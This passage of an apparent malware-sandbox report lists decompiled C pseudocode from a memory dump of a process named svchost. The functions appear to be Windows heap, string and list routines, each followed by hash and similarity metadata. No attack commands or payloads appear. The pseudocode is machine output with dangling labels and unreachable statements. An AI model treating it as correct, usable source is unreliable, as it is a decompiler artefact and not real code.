                        				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                        				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                        				_t7 = _t55 + 8; // 0x8
                        				_t57 = 6;
                        				memcpy(_t7, _t79, _t57 << 2);
                        				_t80 = 0xfffffffe;
                        				 *(_t83 - 4) = _t80;
                        				if(0 < 0) {
                        					L14:
                        					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        					L20:
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                        					_t39 = _t81;
                        					goto L11;
                        				}
                        				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                        					_t81 = 0xc000007b;
                        					goto L20;
                        				}
                        				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                        					_t59 =  *((intOrPtr*)(_t83 + 8));
                        					_t45 =  *_t59;
                        					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                        					 *_t59 = _t45 + 1;
                        					L6:
                        					 *(_t83 - 4) = 1;
                        					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *(_t83 - 4) = _t80;
                        					if(_t68 < 0) {
                        						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                        						if(_t82 == 0) {
                        							goto L14;
                        						}
                        						asm("btr eax, ecx");
                        						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        						if( *_t82 != 0) {
                        							 *0x3117b10 =  *0x3117b10 - 8;
                        						}
                        						goto L20;
                        					}
                        					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                        					_t51 =  *0x311536c; // 0x77495368
                        					if( *_t51 != 0x3115368) {
                        						_push(3);
                        						asm("int 0x29");
                        						goto L14;
                        					}
                        					 *_t55 = 0x3115368;
                        					 *((intOrPtr*)(_t55 + 4)) = _t51;
                        					 *_t51 = _t55;
                        					 *0x311536c = _t55;
                        					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                        					if(_t52 != 0) {
                        						 *_t52 = _t55;
                        					}
                        					_t39 = 0;
                        					goto L11;
                        				}
                        				_t77 =  *((intOrPtr*)(_t83 + 8));
                        				_t68 = E0305A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                        				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                        				if(_t68 < 0) {
                        					goto L14;
                        				}
                        				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                        				goto L6;
                        			}



















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 26635bebb88e9d45fb4125a86d40d506aff2fc8aebd558e5746dde18e75dabd2
                        • Instruction ID: c75f076cfe6a913a76f90fb6a71573f9a1391651a683ecc89e1b15a3bb36182b
                        • Opcode Fuzzy Hash: 26635bebb88e9d45fb4125a86d40d506aff2fc8aebd558e5746dde18e75dabd2
                        • Instruction Fuzzy Hash: 1D415CB5A02209DFDB05CF58D990B9EB7F5BF89300F1981AAE804AF384C774A941CF64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E03063D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed short** _t33;
                        				short* _t38;
                        				intOrPtr* _t39;
                        				intOrPtr* _t41;
                        				signed short _t43;
                        				intOrPtr* _t47;
                        				intOrPtr* _t53;
                        				signed short _t57;
                        				intOrPtr _t58;
                        				signed short _t60;
                        				signed short* _t61;
                        
                        				_t47 = __ecx;
                        				_t61 = __edx;
                        				_t60 = ( *__ecx & 0x0000ffff) + 2;
                        				if(_t60 > 0xfffe) {
                        					L22:
                        					return 0xc0000106;
                        				}
                        				if(__edx != 0) {
                        					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                        						L5:
                        						E03037B60(0, _t61, 0x30011c4);
                        						_v12 =  *_t47;
                        						_v12 = _v12 + 0xfff8;
                        						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                        						E03037B60(0xfff8, _t61,  &_v12);
                        						_t33 = _a8;
                        						if(_t33 != 0) {
                        							 *_t33 = _t61;
                        						}
                        						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                        						_t53 = _a12;
                        						if(_t53 != 0) {
                        							_t57 = _t61[2];
                        							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                        							while(_t38 >= _t57) {
                        								if( *_t38 == 0x5c) {
                        									_t41 = _t38 + 2;
                        									if(_t41 == 0) {
                        										break;
                        									}
                        									_t58 = 0;
                        									if( *_t41 == 0) {
                        										L19:
                        										 *_t53 = _t58;
                        										goto L7;
                        									}
                        									 *_t53 = _t41;
                        									goto L7;
                        								}
                        								_t38 = _t38 - 2;
                        							}
                        							_t58 = 0;
                        							goto L19;
                        						} else {
                        							L7:
                        							_t39 = _a16;
                        							if(_t39 != 0) {
                        								 *_t39 = 0;
                        								 *((intOrPtr*)(_t39 + 4)) = 0;
                        								 *((intOrPtr*)(_t39 + 8)) = 0;
                        								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                        							}
                        							return 0;
                        						}
                        					}
                        					_t61 = _a4;
                        					if(_t61 != 0) {
                        						L3:
                        						_t43 = L03044620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                        						_t61[2] = _t43;
                        						if(_t43 == 0) {
                        							return 0xc0000017;
                        						}
                        						_t61[1] = _t60;
                        						 *_t61 = 0;
                        						goto L5;
                        					}
                        					goto L22;
                        				}
                        				_t61 = _a4;
                        				if(_t61 == 0) {
                        					return 0xc000000d;
                        				}
                        				goto L3;
                        			}

















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8e321f79e77b939d1e2d4abf7af55d8d57112acdae85c2f28ecc93b766c15d7
                        • Instruction ID: cda5480695da77d2b86c37e21556028288915c587634312a2b9a07dbcda8cb11
                        • Opcode Fuzzy Hash: e8e321f79e77b939d1e2d4abf7af55d8d57112acdae85c2f28ecc93b766c15d7
                        • Instruction Fuzzy Hash: 90319279606615DBD724CF29D841A6FBBF5EF4570070984AEE446CB3A5E730D840C7E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E0304C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                        				signed int* _v8;
                        				char _v16;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t33;
                        				signed char _t43;
                        				signed char _t48;
                        				signed char _t62;
                        				void* _t63;
                        				intOrPtr _t69;
                        				intOrPtr _t71;
                        				unsigned int* _t82;
                        				void* _t83;
                        
                        				_t80 = __ecx;
                        				_t82 = __edx;
                        				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                        				_t62 = _t33 >> 0x00000001 & 0x00000001;
                        				if((_t33 & 0x00000001) != 0) {
                        					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                        					if(E03047D50() != 0) {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					} else {
                        						_t43 = 0x7ffe0386;
                        					}
                        					if( *_t43 != 0) {
                        						_t43 = E030F8D34(_v8, _t80);
                        					}
                        					E03042280(_t43, _t82);
                        					if( *((char*)(_t80 + 0xdc)) == 0) {
                        						E0303FFB0(_t62, _t80, _t82);
                        						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                        						_t30 = _t80 + 0xd0; // 0xd0
                        						_t83 = _t30;
                        						E030F8833(_t83,  &_v16);
                        						_t81 = _t80 + 0x90;
                        						E0303FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                        						_t63 = 0;
                        						_push(0);
                        						_push(_t83);
                        						_t48 = E0306B180();
                        						if(_a4 != 0) {
                        							E03042280(_t48, _t81);
                        						}
                        					} else {
                        						_t69 = _v8;
                        						_t12 = _t80 + 0x98; // 0x98
                        						_t13 = _t69 + 0xc; // 0x575651ff
                        						E0304BB2D(_t13, _t12);
                        						_t71 = _v8;
                        						_t15 = _t80 + 0xb0; // 0xb0
                        						_t16 = _t71 + 8; // 0x8b000cc2
                        						E0304BB2D(_t16, _t15);
                        						E0304B944(_v8, _t62);
                        						 *((char*)(_t80 + 0xdc)) = 0;
                        						E0303FFB0(0, _t80, _t82);
                        						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                        						 *(_t80 + 0xde) = 0;
                        						if(_a4 == 0) {
                        							_t25 = _t80 + 0x90; // 0x90
                        							E0303FFB0(0, _t80, _t25);
                        						}
                        						_t63 = 1;
                        					}
                        					return _t63;
                        				}
                        				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                        				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                        				if(_a4 == 0) {
                        					_t24 = _t80 + 0x90; // 0x90
                        					E0303FFB0(0, __ecx, _t24);
                        				}
                        				return 0;
                        			}

















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction ID: 1005e45894525c992b4ab7f69484a19224aaeb806ccbcf77b40de0e4173f4f1d
                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction Fuzzy Hash: DA3128B5B0764ABFE744EBB4C480BE9F798BF82204F08456AD41C8B211DB74AB45D7E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E030A7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                        				signed int _v8;
                        				char _v588;
                        				intOrPtr _v592;
                        				intOrPtr _v596;
                        				signed short* _v600;
                        				char _v604;
                        				short _v606;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short* _t55;
                        				void* _t56;
                        				signed short* _t58;
                        				signed char* _t61;
                        				char* _t68;
                        				void* _t69;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t75;
                        
                        				_t64 = __edx;
                        				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                        				_v8 =  *0x311d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                        				_t55 = _a16;
                        				_v606 = __ecx;
                        				_t71 = 0;
                        				_t58 = _a12;
                        				_v596 = __edx;
                        				_v600 = _t58;
                        				_t68 =  &_v588;
                        				if(_t58 != 0) {
                        					_t71 = ( *_t58 & 0x0000ffff) + 2;
                        					if(_t55 != 0) {
                        						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                        					}
                        				}
                        				_t8 = _t71 + 0x2a; // 0x28
                        				_t33 = _t8;
                        				_v592 = _t8;
                        				if(_t71 <= 0x214) {
                        					L6:
                        					 *((short*)(_t68 + 6)) = _v606;
                        					if(_t64 != 0xffffffff) {
                        						asm("cdq");
                        						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                        						 *((char*)(_t68 + 0x28)) = _a4;
                        						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                        						 *((char*)(_t68 + 0x29)) = _a8;
                        						if(_t71 != 0) {
                        							_t22 = _t68 + 0x2a; // 0x2a
                        							_t64 = _t22;
                        							E030A6B4C(_t58, _t22, _t71,  &_v604);
                        							if(_t55 != 0) {
                        								_t25 = _v604 + 0x2a; // 0x2a
                        								_t64 = _t25 + _t68;
                        								E030A6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                        							}
                        							if(E03047D50() == 0) {
                        								_t61 = 0x7ffe0384;
                        							} else {
                        								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							}
                        							_push(_t68);
                        							_push(_v592 + 0xffffffe0);
                        							_push(0x402);
                        							_push( *_t61 & 0x000000ff);
                        							E03069AE0();
                        						}
                        					}
                        					_t35 =  &_v588;
                        					if( &_v588 != _t68) {
                        						_t35 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                        					}
                        					L16:
                        					_pop(_t69);
                        					_pop(_t72);
                        					_pop(_t56);
                        					return E0306B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                        				}
                        				_t68 = L03044620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                        				if(_t68 == 0) {
                        					goto L16;
                        				} else {
                        					_t58 = _v600;
                        					_t64 = _v596;
                        					goto L6;
                        				}
                        			}























                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 587357eac669dc54d6384a89859c36fa3cd79a6751898860672b1f29a887ad9d
                        • Instruction ID: e3ad7c09f144fb7d63851bbfe9f79a551ef83388ecf357ca9199a9082448786b
                        • Opcode Fuzzy Hash: 587357eac669dc54d6384a89859c36fa3cd79a6751898860672b1f29a887ad9d
                        • Instruction Fuzzy Hash: 7F31A876605B519BC310DFACD950EAAB7F5BFC8B00F088A2DF9558B690E730E904C7A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E030D3D40(intOrPtr __ecx, char* __edx) {
                        				signed int _v8;
                        				char* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed char _v24;
                        				char _v28;
                        				char _v29;
                        				intOrPtr* _v32;
                        				char _v36;
                        				char _v37;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char _t34;
                        				intOrPtr* _t37;
                        				intOrPtr* _t42;
                        				intOrPtr* _t47;
                        				intOrPtr* _t48;
                        				intOrPtr* _t49;
                        				char _t51;
                        				void* _t52;
                        				intOrPtr* _t53;
                        				char* _t55;
                        				char _t59;
                        				char* _t61;
                        				intOrPtr* _t64;
                        				void* _t65;
                        				char* _t67;
                        				void* _t68;
                        				signed int _t70;
                        
                        				_t62 = __edx;
                        				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                        				_v8 =  *0x311d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                        				_t34 =  &_v28;
                        				_v20 = __ecx;
                        				_t67 = __edx;
                        				_v24 = _t34;
                        				_t51 = 0;
                        				_v12 = __edx;
                        				_v29 = 0;
                        				_v28 = _t34;
                        				E03042280(_t34, 0x3118a6c);
                        				_t64 =  *0x3115768; // 0x77495768
                        				if(_t64 != 0x3115768) {
                        					while(1) {
                        						_t8 = _t64 + 8; // 0x77495770
                        						_t42 = _t8;
                        						_t53 = _t64;
                        						 *_t42 =  *_t42 + 1;
                        						_v16 = _t42;
                        						E0303FFB0(_t53, _t64, 0x3118a6c);
                        						 *0x311b1e0(_v24, _t67);
                        						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                        							_v37 = 1;
                        						}
                        						E03042280(_t45, 0x3118a6c);
                        						_t47 = _v28;
                        						_t64 =  *_t64;
                        						 *_t47 =  *_t47 - 1;
                        						if( *_t47 != 0) {
                        							goto L8;
                        						}
                        						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                        							L10:
                        							_push(3);
                        							asm("int 0x29");
                        						} else {
                        							_t48 =  *((intOrPtr*)(_t53 + 4));
                        							if( *_t48 != _t53) {
                        								goto L10;
                        							} else {
                        								 *_t48 = _t64;
                        								_t61 =  &_v36;
                        								 *((intOrPtr*)(_t64 + 4)) = _t48;
                        								_t49 = _v32;
                        								if( *_t49 != _t61) {
                        									goto L10;
                        								} else {
                        									 *_t53 = _t61;
                        									 *((intOrPtr*)(_t53 + 4)) = _t49;
                        									 *_t49 = _t53;
                        									_v32 = _t53;
                        									goto L8;
                        								}
                        							}
                        						}
                        						L11:
                        						_t51 = _v29;
                        						goto L12;
                        						L8:
                        						if(_t64 != 0x3115768) {
                        							_t67 = _v20;
                        							continue;
                        						}
                        						goto L11;
                        					}
                        				}
                        				L12:
                        				E0303FFB0(_t51, _t64, 0x3118a6c);
                        				while(1) {
                        					_t37 = _v28;
                        					_t55 =  &_v28;
                        					if(_t37 == _t55) {
                        						break;
                        					}
                        					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                        						goto L10;
                        					} else {
                        						_t59 =  *_t37;
                        						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                        							goto L10;
                        						} else {
                        							_t62 =  &_v28;
                        							_v28 = _t59;
                        							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                        							continue;
                        						}
                        					}
                        					L18:
                        				}
                        				_pop(_t65);
                        				_pop(_t68);
                        				_pop(_t52);
                        				return E0306B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                        				goto L18;
                        			}


































                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2121b561feaa3316c3dd41d39e719ed41635aaf2275d3c22fae74b0b5c4ea6ba
                        • Instruction ID: 8653b99eed2ec021741a8452c6830870709896c63afcf187f0b5212b460c53fd
                        • Opcode Fuzzy Hash: 2121b561feaa3316c3dd41d39e719ed41635aaf2275d3c22fae74b0b5c4ea6ba
                        • Instruction Fuzzy Hash: B5318CB5A0A302DFC714DF14D58059ABBE5FFC9604F4889AEF4989B291D730DE04CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E0305A70E(intOrPtr* __ecx, char* __edx) {
                        				unsigned int _v8;
                        				intOrPtr* _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t28;
                        				char* _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t38;
                        				void* _t50;
                        				intOrPtr _t52;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t52 =  *0x3117b10; // 0x0
                        				_t33 = __edx;
                        				_t48 = __ecx;
                        				_v12 = __ecx;
                        				if(_t52 == 0) {
                        					 *0x3117b10 = 8;
                        					 *0x3117b14 = 0x3117b0c;
                        					 *0x3117b18 = 1;
                        					L6:
                        					_t2 = _t52 + 1; // 0x1
                        					E0305A990(0x3117b10, _t2, 7);
                        					asm("bts ecx, eax");
                        					 *_t48 = _t52;
                        					 *_t33 = 1;
                        					L3:
                        					_t16 = 0;
                        					L4:
                        					return _t16;
                        				}
                        				_t17 = L0305A840(__edx, __ecx, __ecx, _t52, 0x3117b10, 1, 0);
                        				if(_t17 == 0xffffffff) {
                        					_t37 =  *0x3117b10; // 0x0
                        					_t3 = _t37 + 0x27; // 0x27
                        					__eflags = _t3 >> 5 -  *0x3117b18; // 0x0
                        					if(__eflags > 0) {
                        						_t38 =  *0x3117b9c; // 0x0
                        						_t4 = _t52 + 0x27; // 0x27
                        						_v8 = _t4 >> 5;
                        						_t50 = L03044620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                        						__eflags = _t50;
                        						if(_t50 == 0) {
                        							_t16 = 0xc0000017;
                        							goto L4;
                        						}
                        						 *0x3117b18 = _v8;
                        						_t8 = _t52 + 7; // 0x7
                        						E0306F3E0(_t50,  *0x3117b14, _t8 >> 3);
                        						_t28 =  *0x3117b14; // 0x0
                        						__eflags = _t28 - 0x3117b0c;
                        						if(_t28 != 0x3117b0c) {
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        						}
                        						_t9 = _t52 + 8; // 0x8
                        						 *0x3117b14 = _t50;
                        						_t48 = _v12;
                        						 *0x3117b10 = _t9;
                        						goto L6;
                        					}
                        					 *0x3117b10 = _t37 + 8;
                        					goto L6;
                        				}
                        				 *__ecx = _t17;
                        				 *_t33 = 0;
                        				goto L3;
                        			}

















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6a7ecfbf138f7e6e70eebf4cab5ff36068ae1ebf4d6063348e2122e82885a935
                        • Instruction ID: 4457d3fbdf719ded397e2d0ad79e6d3dd50476812d1650d0c1b38a06b9747aaf
                        • Opcode Fuzzy Hash: 6a7ecfbf138f7e6e70eebf4cab5ff36068ae1ebf4d6063348e2122e82885a935
                        • Instruction Fuzzy Hash: F131A1B17012059FC716EB18FE80FABBBF9FB88710F140A6AE41597384D7749981CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E0302AA16(signed short* __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				signed short _v16;
                        				intOrPtr _v20;
                        				signed short _v24;
                        				signed short _v28;
                        				void* _v32;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t25;
                        				signed short _t38;
                        				signed short* _t42;
                        				signed int _t44;
                        				signed short* _t52;
                        				signed short _t53;
                        				signed int _t54;
                        
                        				_v8 =  *0x311d360 ^ _t54;
                        				_t42 = __ecx;
                        				_t44 =  *__ecx & 0x0000ffff;
                        				_t52 =  &(__ecx[2]);
                        				_t51 = _t44 + 2;
                        				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                        					L4:
                        					_t25 =  *0x3117b9c; // 0x0
                        					_t53 = L03044620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                        					__eflags = _t53;
                        					if(_t53 == 0) {
                        						L3:
                        						return E0306B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                        					} else {
                        						E0306F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                        						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                        						L2:
                        						_t51 = 4;
                        						if(L03036C59(_t53, _t51, _t58) != 0) {
                        							_t28 = E03055E50(0x300c338, 0, 0,  &_v32);
                        							__eflags = _t28;
                        							if(_t28 == 0) {
                        								_t38 = ( *_t42 & 0x0000ffff) + 2;
                        								__eflags = _t38;
                        								_v24 = _t53;
                        								_v16 = _t38;
                        								_v20 = 0;
                        								_v12 = 0;
                        								E0305B230(_v32, _v28, 0x300c2d8, 1,  &_v24);
                        								_t28 = E0302F7A0(_v32, _v28);
                        							}
                        							__eflags = _t53 -  *_t52;
                        							if(_t53 !=  *_t52) {
                        								_t28 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						goto L3;
                        					}
                        				}
                        				_t53 =  *_t52;
                        				_t44 = _t44 >> 1;
                        				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                        				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}





















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7395d5ed7a7036b27b9553c1474fd53ecc3ba8306aa373148e90e6b18cb40937
                        • Instruction ID: 99ab68417e590cc47384197dbc0dbed3a9ffae571fc613ad5278f4224b625275
                        • Opcode Fuzzy Hash: 7395d5ed7a7036b27b9553c1474fd53ecc3ba8306aa373148e90e6b18cb40937
                        • Instruction Fuzzy Hash: F631F771A02229ABCF14EF65CD81ABFB7B8FF44700F054469F901DB150EB74AA10C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E030561A0(signed int* __ecx) {
                        				intOrPtr _v8;
                        				char _v12;
                        				intOrPtr* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				void* _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t49;
                        				signed int _t51;
                        				intOrPtr _t52;
                        				signed int _t54;
                        				void* _t59;
                        				signed int* _t61;
                        				intOrPtr* _t64;
                        
                        				_t61 = __ecx;
                        				_v12 = 0;
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        				_v16 = __ecx;
                        				_v8 = 0;
                        				if(_t30 == 0) {
                        					L6:
                        					_t31 = 0;
                        					L7:
                        					return _t31;
                        				}
                        				_t32 = _t30 + 0x5d8;
                        				if(_t32 == 0) {
                        					goto L6;
                        				}
                        				_t59 = _t32 + 0x30;
                        				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                        					goto L6;
                        				}
                        				if(__ecx != 0) {
                        					 *((intOrPtr*)(__ecx)) = 0;
                        					 *((intOrPtr*)(__ecx + 4)) = 0;
                        				}
                        				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                        					_t51 =  *(_t32 + 0x10);
                        					_t33 = _t32 + 0x10;
                        					_v20 = _t33;
                        					_t54 =  *(_t33 + 4);
                        					if((_t51 | _t54) == 0) {
                        						_t37 = E03055E50(0x30067cc, 0, 0,  &_v12);
                        						if(_t37 != 0) {
                        							goto L6;
                        						}
                        						_t52 = _v8;
                        						asm("lock cmpxchg8b [esi]");
                        						_t64 = _v16;
                        						_t49 = _t37;
                        						_v20 = 0;
                        						if(_t37 == 0) {
                        							if(_t64 != 0) {
                        								 *_t64 = _v12;
                        								 *((intOrPtr*)(_t64 + 4)) = _t52;
                        							}
                        							E030F9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                        							_t31 = 1;
                        							goto L7;
                        						}
                        						E0302F7C0(_t52, _v12, _t52, 0);
                        						if(_t64 != 0) {
                        							 *_t64 = _t49;
                        							 *((intOrPtr*)(_t64 + 4)) = _v20;
                        						}
                        						L12:
                        						_t31 = 1;
                        						goto L7;
                        					}
                        					if(_t61 != 0) {
                        						 *_t61 = _t51;
                        						_t61[1] = _t54;
                        					}
                        					goto L12;
                        				} else {
                        					goto L6;
                        				}
                        			}




















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d5df1bb2d5381f6a90c555eec2111ace50c51815ba1ffcfeab48e66bbf84792
                        • Instruction ID: 5a07eb9fd431d67760183238dcbc9b930790e17bba1fa8eddffe87623cdf63c9
